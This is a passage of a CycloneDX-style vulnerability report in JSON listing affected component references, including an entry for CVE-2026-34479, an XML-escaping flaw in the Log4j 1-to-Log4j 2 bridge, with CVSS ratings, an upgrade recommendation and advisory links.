"urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#3ad287ba-29f8-47a4-9fdd-cdc6bf54d6ee" }, { "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#3ad287ba-29f8-47a4-9fdd-cdc6bf54d6ee" }, { "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#1879627a-3892-47c2-bda6-60c0f4d1a810" }, { "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#1879627a-3892-47c2-bda6-60c0f4d1a810" }, { "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#1879627a-3892-47c2-bda6-60c0f4d1a810" }, { "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#1879627a-3892-47c2-bda6-60c0f4d1a810" }, { "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#9172f766-456d-48ab-b611-1f0208cdf206" }, { "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#9172f766-456d-48ab-b611-1f0208cdf206" }, { "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#9172f766-456d-48ab-b611-1f0208cdf206" }, { "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#9172f766-456d-48ab-b611-1f0208cdf206" }, { "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#158e728b-3d7f-45e7-b632-5a1291af0e7b" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#158e728b-3d7f-45e7-b632-5a1291af0e7b" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#158e728b-3d7f-45e7-b632-5a1291af0e7b" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#158e728b-3d7f-45e7-b632-5a1291af0e7b" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#0398830b-9f3d-42ef-a8fa-a1aa5ee207a0" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#0398830b-9f3d-42ef-a8fa-a1aa5ee207a0" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#0398830b-9f3d-42ef-a8fa-a1aa5ee207a0" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#0398830b-9f3d-42ef-a8fa-a1aa5ee207a0" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#83af83c1-47e0-46ce-89f6-ffcadae11cbf" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#83af83c1-47e0-46ce-89f6-ffcadae11cbf" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#83af83c1-47e0-46ce-89f6-ffcadae11cbf" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#83af83c1-47e0-46ce-89f6-ffcadae11cbf" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#581c68e4-8e15-46ba-8544-7ef71435d4ea" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#581c68e4-8e15-46ba-8544-7ef71435d4ea" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#581c68e4-8e15-46ba-8544-7ef71435d4ea" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#581c68e4-8e15-46ba-8544-7ef71435d4ea" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#0e956f60-e2c6-4ad1-9f30-f8c861929cef" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#0e956f60-e2c6-4ad1-9f30-f8c861929cef" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#0e956f60-e2c6-4ad1-9f30-f8c861929cef" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#0e956f60-e2c6-4ad1-9f30-f8c861929cef" } ], "analysis": { "state": "in_triage", "justification": "", "response": [], "detail": "This CVE is under investigation by Confluent." } }, { "id": "CVE-2026-34479", "source": { "name": "ghsa", "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven" }, "ratings": [ { "source": { "name": "nvd" }, "score": 7.5, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" }, { "source": { "name": "redhat" }, "score": 5.3, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "cwes": [ 116 ], "description": "The Log4j1XmlLayout from the Apache Log4j 1-to-Log4j 2 bridge fails to escape characters forbidden by the XML 1.0 standard, producing malformed XML output. Conforming XML parsers are required to reject documents containing such characters with a fatal error, which may cause downstream log processing systems to drop or fail to index affected records.\n\nTwo groups of users are affected:\n\n * Those using Log4j1XmlLayout directly in a Log4j Core 2 configuration file.\n * Those using the Log4j 1 configuration compatibility layer with org.apache.log4j.xml.XMLLayout specified as the layout class.\n\n\nUsers are advised to upgrade to Apache Log4j 1-to-Log4j 2 bridge version 2.25.4, which corrects this issue.\n\nNote: The Apache Log4j 1-to-Log4j 2 bridge is deprecated and will not be present in Log4j 3. Users are encouraged to consult the Log4j 1 to Log4j 2 migration guide https://logging.apache.org/log4j/2.x/migrate-from-log4j1.html , and specifically the section on eliminating reliance on the bridge.", "recommendation": "Upgrade org.apache.logging.log4j:log4j-1.2-api to version 2.25.4", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-34479" }, { "url": "http://www.openwall.com/lists/oss-security/2026/04/10/8" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-34479" }, { "url": "https://github.com/apache/logging-log4j2" }, { "url": "https://github.com/apache/logging-log4j2/pull/4078" }, { "url": "https://lists.apache.org/thread/gd0hp6mj17rn3kj279vgy4p7kd4zz5on" }, { "url": "https://logging.apache.org/cyclonedx/vdr.xml" }, { "url": "https://logging.apache.org/log4j/2.x/migrate-from-log4j1.html" }, { "url": "https://logging.apache.org/security.html#CVE-2026-34479" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34479" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-34479" } ], "published": "2026-04-10T16:16:31+00:00", "updated": "2026-05-06T18:21:34+00:00", "affects": [ { "ref": "pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3", "versions": [ { "version": "2.25.3", "status": "affected" } ] }, { "ref": "pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3", "versions": [ { "version": "2.25.3", "status": "affected" } ] }, { "ref": "pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3", "versions": [ { "version": "2.25.3", "status": "affected" } ] }, { "ref": "pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3", "versions": [ { "version": "2.25.3", "status": "affected" } ] }, { "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#55b43b4a-82cb-4a59-8429-8465f67b3dd6" }, { "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#55b43b4a-82cb-4a59-8429-8465f67b3dd6" }, { "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#55b43b4a-82cb-4a59-8429-8465f67b3dd6" }, { "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#55b43b4a-82cb-4a59-8429-8465f67b3dd6" }, { "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#0d21e41a-f810-4500-89fc-0b81ccf1989d" }, { "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#0d21e41a-f810-4500-89fc-0b81ccf1989d" }, { "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#0d21e41a-f810-4500-89fc-0b81ccf1989d" }, { "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#0d21e41a-f810-4500-89fc-0b81ccf1989d" }, { "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:17b63bf1-a7f6-476f-9af1-58e45e17a6a7/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:17b63bf1-a7f6-476f-9af1-58e45e17a6a7/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:17b63bf1-a7f6-476f-9af1-58e45e17a6a7/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:17b63bf1-a7f6-476f-9af1-58e45e17a6a7/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:9cfedadb-581e-44dd-adca-95d605fbe99a/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:9cfedadb-581e-44dd-adca-95d605fbe99a/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:9cfedadb-581e-44dd-adca-95d605fbe99a/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:9cfedadb-581e-44dd-adca-95d605fbe99a/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#96124910-c15e-4db7-ab1b-5ad921e841f7" }, { "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#96124910-c15e-4db7-ab1b-5ad921e841f7" }, { "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#96124910-c15e-4db7-ab1b-5ad921e841f7" }, { "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#96124910-c15e-4db7-ab1b-5ad921e841f7" }, { "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#1457d357-f148-4ec4-87b9-f7914813399a" }, { "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#1457d357-f148-4ec4-87b9-f7914813399a" }, { "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#1457d357-f148-4ec4-87b9-f7914813399a" }, { "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#1457d357-f148-4ec4-87b9-f7914813399a" }, { "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#1e4c7647-5a63-40bb-85e9-e80ed85613d0" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#1e4c7647-5a63-40bb-85e9-e80ed85613d0" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#1e4c7647-5a63-40bb-85e9-e80ed85613d0" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#1e4c7647-5a63-40bb-85e9-e80ed85613d0" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#7f58578f-0943-45ec-91f5-81f2d38278b0" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#7f58578f-0943-45ec-91f5-81f2d38278b0" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#7f58578f-0943-45ec-91f5-81f2d38278b0" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#7f58578f-0943-45ec-91f5-81f2d38278b0" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": 